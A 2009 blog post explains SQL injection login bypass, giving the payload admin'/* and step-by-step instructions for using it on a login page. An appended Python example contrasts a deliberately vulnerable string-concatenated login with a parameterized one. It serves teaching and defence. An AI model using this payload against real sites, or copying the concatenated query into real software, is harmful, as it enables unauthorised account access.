Tuesday, January 20, 2009

SQL injection

SQL injection is a common hacking technique which is quite easy to perform. By using some logical SQL, one can crack into a web login. The whole concept works on the principle of delimiters.

For example, if my SQL for login is

select * from login_tbl where username='admin' and password='@#@#'

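the query can be executed successfully by delimiting it to

select * from login_tbl where username='admin'/*' and password='@#@#'
(provided I know the username; that would need some guesswork)

The quote after admin closes the string, and /* starts a comment, so the password check that follows is never evaluated.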


Now the practical implementation

In the login page, type admin'/* as the username.
Any password will do the trick.

This gives the same effect as
select * from login_tbl where username='admin'/*' and password='@#@#'

which readily takes me to the admin page.
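
The login query above, built by string concatenation, next to the same check written with bound parameters. This is an added example, not code from the original post; it assumes SQLite (which treats an unterminated /* comment as running to the end of the statement), and the function names and the sample account are constructed for illustration.

```python
import sqlite3


def make_db():
    """In-memory database holding one constructed account (sample data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table login_tbl (username text, password text)")
    # Constructed row; a real system stores a password hash, not the password.
    conn.execute("insert into login_tbl values ('admin', 'correct-horse')")
    return conn


def login_vulnerable(conn, username, password):
    # Builds the SQL text from user input, as the login in the post does.
    # A quote in the username ends the string literal early, and /* then
    # turns the rest of the statement into a comment.
    sql = ("select * from login_tbl where username='" + username +
           "' and password='" + password + "'")
    return conn.execute(sql).fetchone()


def login_parameterized(conn, username, password):
    # Placeholders keep the input as data: the quote and /* are compared
    # literally against the stored username and never reach the SQL parser.
    sql = "select * from login_tbl where username=? and password=?"
    return conn.execute(sql, (username, password)).fetchone()


if __name__ == "__main__":
    conn = make_db()
    attempts = [
        ("admin", "correct-horse"),   # valid login
        ("admin", "wrong"),           # wrong password
        ("admin'/*", "wrong"),        # the input from the post
    ]
    for name, pw in attempts:
        print(repr(name), repr(pw),
              "| vulnerable:", login_vulnerable(conn, name, pw) is not None,
              "| parameterized:", login_parameterized(conn, name, pw) is not None)
```

Only the concatenated version accepts the third attempt; the parameterized version rejects it because no stored username equals the literal text admin'/*.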